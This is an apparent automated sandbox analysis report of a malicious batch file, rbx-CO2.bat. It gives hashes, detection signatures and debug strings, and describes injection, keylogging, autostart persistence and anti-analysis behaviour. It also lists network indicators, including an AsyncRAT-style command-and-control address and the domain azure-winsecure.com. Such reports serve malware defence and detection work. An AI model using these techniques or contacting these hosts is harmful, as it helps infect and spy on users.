Windows Analysis Report
rbx-CO2.bat

Overview

General Information

Sample name: rbx-CO2.bat
Analysis ID: 1524982
MD5: d1324a085a54c035d136f7a73edec440
SHA1: 3049e422f937395d1d64e205ce5978182d3c2388
SHA256: 6a25d0ca74a29596a0c09f26acbe9f85a46d5c1c886a6860dc915d94ffbbbe5a
Tags: azure-winsecure-combatuser-smica83

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
.NET source code contains process injector
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious names
Creates autostart registry keys with suspicious values (likely registry only malware)
Found large BAT file
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs a global keyboard hook
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sets debug register (to hijack the execution of another thread)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powerup Write Hijack DLL
Suspicious command line found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

AV Detection

Source: Submitted Sample Integrated Neural Analysis Model: Matched 98.9% probability
Source: unknown HTTPS traffic detected: 147.135.36.89:443 -> 192.168.2.6:59173 version: TLS 1.2
Source: Binary string: System.Configuration.Install.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Data.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: d.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbSystem.DirectoryServices.dll source: WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Windows.Forms.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb` source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.ServiceProcess.pdbp}Y source: WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Drawing.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Core.pdb`- source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000030.00000000.2811892265.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3403906582.000002259585D000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Drawing.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.pdbP< source: WER6AC3.tmp.dmp.11.dr
Source: Binary string: mscorlib.pdbh source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Core.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Numerics.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.DirectoryServices.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.ServiceProcess.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Numerics.pdbP source: WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: mscorlib.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000030.00000000.2811892265.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3403906582.000002259585D000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ServiceProcess.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Configuration.Install.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Xml.pdbP4 source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000030.00000000.2811717839.000002259582B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402005843.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Configuration.Install.pdbMicrosoft.PowerShell.Commands.Utility.dllH source: WER8C9.tmp.dmp.27.dr
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000030.00000000.2811892265.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3403906582.000002259585D000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb@y' source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Xml.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000030.00000000.2811717839.000002259582B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402005843.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.DirectoryServices.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.CSharp.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Management.pdb`*?@_*? source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.Configuration.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Configuration.Install.pdbH source: WER6AC3.tmp.dmp.11.dr
Source: Binary string: +@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000030.00000000.2811717839.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Data.ni.pdbRSDSC source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Data.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Configuration.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Xml.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbcache source: svchost.exe, 00000030.00000000.2811892265.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3403906582.000002259585D000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Data.pdbH source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Windows.Forms.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: 7\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000030.00000002.3402005843.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: mscorlib.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.pdbpl source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.Management.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Drawing.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Management.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdbH source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.Core.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.DirectoryServices.pdbx*? source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.Transactions.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Transactions.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000030.00000000.2811717839.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Numerics.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Transactions.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000030.00000002.3402005843.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC40D894 FindFirstFileExW, 17_2_00000253FC40D894
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC40DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 17_2_00000253FC40DA18
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC43D894 FindFirstFileExW, 17_2_00000253FC43D894
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC43DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 17_2_00000253FC43DA18
Source: C:\Windows\System32\conhost.exe Code function: 18_2_000002A5AF36D894 FindFirstFileExW, 18_2_000002A5AF36D894
Source: C:\Windows\System32\conhost.exe Code function: 18_2_000002A5AF36DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 18_2_000002A5AF36DA18
Source: C:\Windows\System32\conhost.exe Code function: 37_2_000001780DD2DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 37_2_000001780DD2DA18
Source: C:\Windows\System32\conhost.exe Code function: 37_2_000001780DD2D894 FindFirstFileExW, 37_2_000001780DD2D894
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000020175EBDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 38_2_0000020175EBDA18
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000020175EBD894 FindFirstFileExW, 38_2_0000020175EBD894
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000020175EEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 38_2_0000020175EEDA18
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000020175EED894 FindFirstFileExW, 38_2_0000020175EED894
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_000002D0165ED894 FindFirstFileExW, 39_2_000002D0165ED894
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_000002D0165EDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 39_2_000002D0165EDA18
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_000002D01661D894 FindFirstFileExW, 39_2_000002D01661D894
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_000002D01661DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 39_2_000002D01661DA18

Networking

Source: Network traffic Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 154.216.20.132:6969 -> 192.168.2.6:59172
Source: global traffic TCP traffic: 192.168.2.6:59172 -> 154.216.20.132:6969
Source: Joe Sandbox View IP Address: 147.135.36.89 147.135.36.89
Source: Joe Sandbox View ASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo SKHT-ASShenzhenKatherineHengTechnologyInformationCo
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown DNS query: name: ipwho.is
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: azure-winsecure.com
Source: global traffic DNS traffic detected: DNS query: ipwho.is
Source: Microsoft-Windows-LiveId%4Operational.evtx.49.dr String found in binary or memory: http://Passport.NET/tb
Source: lsass.exe, 00000028.00000000.2770662119.000002D6F0E13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: lsass.exe, 00000028.00000000.2770382971.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3426941259.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: lsass.exe, 00000028.00000002.3424186913.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 00000028.00000002.3424186913.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3421815626.000002D6F0CF2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770090274.000002D6F0CF2000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: lsass.exe, 00000028.00000000.2770662119.000002D6F0E13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3424186913.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: lsass.exe, 00000028.00000000.2770382971.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3426941259.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: lsass.exe, 00000028.00000000.2770662119.000002D6F0E13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: lsass.exe, 00000028.00000000.2770382971.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3426941259.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: lsass.exe, 00000028.00000002.3424186913.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3421815626.000002D6F0CF2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770090274.000002D6F0CF2000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000028.00000002.3424186913.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 00000028.00000000.2770382971.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3426941259.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 00000028.00000000.2770662119.000002D6F0E13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3424186913.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: lsass.exe, 00000028.00000000.2770662119.000002D6F0E13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: lsass.exe, 00000028.00000002.3424186913.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769648555.000002D6F0C44000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3413839757.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2770242861.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000028.00000000.2770382971.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3426941259.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769397436.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
